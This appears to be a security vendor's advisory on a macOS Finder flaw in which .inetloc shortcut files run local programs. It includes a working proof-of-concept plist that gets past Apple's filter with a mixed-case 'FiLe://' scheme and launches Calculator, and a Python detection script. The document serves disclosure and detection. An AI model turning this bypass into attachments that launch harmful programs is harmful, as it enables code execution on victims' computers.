Apple macOS Finder - Remote Command Execution


Description

The Finder app in macOS is a gateway to all of the files, apps and downloads on a Mac.


Vulnerability

An independent security researcher, Park Minchan, has discovered a vulnerability in macOS Finder that allows .inetloc files to execute arbitrary commands. An .inetloc file is an Internet location shortcut: a property list whose URL key names the resource Finder opens when the file is double-clicked. Because that URL may use the file:// scheme, a crafted .inetloc file delivered to the victim (for example as an email attachment) can point at a local application or executable, and Finder opens it without any warning or prompt.


Identification

The proof of concept below shows the contents of a .inetloc file that triggers this vulnerability. Newer versions of macOS, from Big Sur onwards, block URLs beginning with "file://", but the check is a case-sensitive string match, so a mixed-case scheme such as "FiLe://" is not recognised and is still opened. URL schemes are case-insensitive, so the unusual capitalisation and the run of extra slashes still resolve to /System/Applications/Calculator.app, and Finder launches Calculator.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
  <dict>
    <key>URL</key>
    <string>FiLe:////////////////////////System/Applications/Calculator.app</string>
  </dict>
</plist>


Detection

By turning the proof of concept into a traffic file and a matching rule, we are able to detect attempts to exploit this vulnerability to execute arbitrary commands. A rule that only matches the literal string "file://" would miss the exploit for the same reason the OS filter does, so the match has to be case-insensitive and tolerant of the extra slashes.
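The following is an added example, not part of the original advisory or of Idappcom's signature. It parses .inetloc contents with Python's plistlib, compares a case-sensitive "file://" prefix check (mimicking the bypassed filter) against a case-insensitive scheme check, and resolves the slash-padded path to the target it actually opens. The sample .inetloc bodies are constructed inline, and the LOCAL_SCHEMES set is an assumption of this example.

```python
"""Parse .inetloc files and flag the case-variant file:// scheme described above."""
import plistlib
from urllib.parse import urlsplit

# Schemes that make Finder open a local path rather than a web resource.
# Assumption for this example: only "file"; extend the set for your own policy.
LOCAL_SCHEMES = {"file"}


def make_inetloc(url: str) -> bytes:
    """Build an XML-plist .inetloc body around a URL (used only to construct samples)."""
    return plistlib.dumps({"URL": url})


# Constructed samples, not captured files:
#   BYPASS - the proof-of-concept URL: mixed-case scheme and a run of slashes
#   PLAIN  - the same target written as lower-case file://, which the OS filter catches
#   HTTPS  - an ordinary web shortcut that must not be flagged
BYPASS = make_inetloc("FiLe:////////////////////////System/Applications/Calculator.app")
PLAIN = make_inetloc("file:///System/Applications/Calculator.app")
HTTPS = make_inetloc("https://www.idappcom.co.uk/")


def naive_blocked(url: str) -> bool:
    """Mimic the case-sensitive check the text describes: an exact 'file://' prefix."""
    return url.startswith("file://")


def inspect_inetloc(data: bytes) -> dict:
    """Parse an .inetloc (XML or binary plist) and report whether it targets a local path."""
    plist = plistlib.loads(data)  # raises plistlib.InvalidFileException on non-plist input
    url = str(plist.get("URL", "")).strip()
    parts = urlsplit(url)  # urlsplit lower-cases the scheme: "FiLe" -> "file"
    target = ""
    if parts.scheme in LOCAL_SCHEMES:
        # Any number of leading slashes still resolves to the same absolute path.
        target = "/" + parts.path.lstrip("/")
    return {
        "url": url,
        "scheme": parts.scheme,
        "host": parts.netloc,
        "target": target,
        "naive_blocked": naive_blocked(url),
        "flagged": parts.scheme in LOCAL_SCHEMES,
    }


if __name__ == "__main__":
    for name, sample in (("BYPASS", BYPASS), ("PLAIN", PLAIN), ("HTTPS", HTTPS)):
        print(name, inspect_inetloc(sample))
```

Run against the three samples, the proof-of-concept body is reported as not blocked by the prefix check yet flagged by the scheme check, with the target resolved to /System/Applications/Calculator.app; the plain file:// body is caught by both, and the https shortcut by neither. The same normalisation (lower-case the scheme, strip repeated slashes) is what a traffic rule needs so that it does not inherit the filter's weakness.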


Coverage

Idappcom has created signature 8021815 along with a traffic file.


References

SSD Advisory – macOS Finder RCE

Hacker News - Unpatched High-Severity Vulnerability Affects Apple macOS Computers


Traffic IQ

If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can test your defences and report any issues. Learn more here https://www.idappcom.co.uk/traffic-iq-professional